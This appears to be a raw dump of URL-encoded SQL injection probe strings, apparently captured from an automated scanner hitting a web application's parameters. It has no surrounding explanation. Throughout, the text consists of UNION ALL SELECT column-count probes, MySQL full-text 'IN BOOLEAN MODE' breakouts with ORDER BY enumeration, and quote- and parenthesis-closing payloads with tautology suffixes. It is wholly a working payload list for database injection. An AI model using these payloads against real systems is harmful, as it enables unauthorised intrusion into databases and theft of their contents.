-6826%27%20%2B%20%28SELECT%20%27hfKV%27%20WHERE%207185%3D7185%20UNION%20ALL%20SELECT%207185%2C%207185%2C%207185%2C%207185%2C%207185%00%20%29%20%2B%20%27 -2012%27%20%2B%20%28SELECT%20%27mJMk%27%20WHERE%206654%3D6654%20UNION%20ALL%20SELECT%206654%2C%206654%2C%206654%2C%206654%2C%206654%2C%206654%00%20%29%20%2B%20%27 -4617%27%20%2B%20%28SELECT%20%27kAxJ%27%20WHERE%209049%3D9049%20UNION%20ALL%20SELECT%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%00%20%29%20%2B%20%27 -8078%27%20%2B%20%28SELECT%20%27eLPh%27%20WHERE%204871%3D4871%20UNION%20ALL%20SELECT%204871%2C%204871%2C%204871%2C%204871%2C%204871%2C%204871%2C%204871%2C%204871%00%20%29%20%2B%20%27 -5783%27%20%2B%20%28SELECT%20%27SnAS%27%20WHERE%207166%3D7166%20UNION%20ALL%20SELECT%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%00%20%29%20%2B%20%27 -4056%27%20%2B%20%28SELECT%20%27mGRc%27%20WHERE%203313%3D3313%20UNION%20ALL%20SELECT%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%2C%203313%00%20%29%20%2B%20%27 -6909%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%00%20%23 -4672%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%202556%00%20%23 -8765%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204645%00%20%23 -1197%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207080%2C%207080%00%20%23 -6468%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207934%2C%207934%2C%207934%00%20%23 -9388%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206138%2C%206138%2C%206138%2C%206138%00%20%23 -7312%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209719%2C%209719%2C%209719%2C%209719%2C%209719%00%20%23 -3084%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%00%20%23 -8609%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%2C%204449%00%20%23 -9152%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%00%20%23 -4319%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%00%20%23 -8725%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%00%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281988%3D1988 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287786%3D7786 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284430%3D4430 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%288147%3D8147 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281607%3D1607 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281130%3D1130 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282186%3D2186 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281457%3D1457 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282249%3D2249 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%289898%3D9898 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284356%3D4356 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284167%3D4167 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%285428%3D5428 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288770%3D8770 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283264%3D3264 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282102%3D2102 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286525%3D6525 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288575%3D8575 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282256%3D2256 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%289247%3D9247 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288595%3D8595 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287700%3D7700 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288847%3D8847 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288615%3D8615 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289399%3D9399 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282474%3D2474 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284445%3D4445 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%285015%3D5015 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%285550%3D5550 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282343%3D2343 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27xWig%27%3D%27xWig 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27hozn%27%3D%27hozn 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27kMvE%27%3D%27kMvE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27AYVT%27%3D%27AYVT 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27DeQG%27%3D%27DeQG 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27wRdk%27%3D%27wRdk 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27uRNN%27%3D%27uRNN 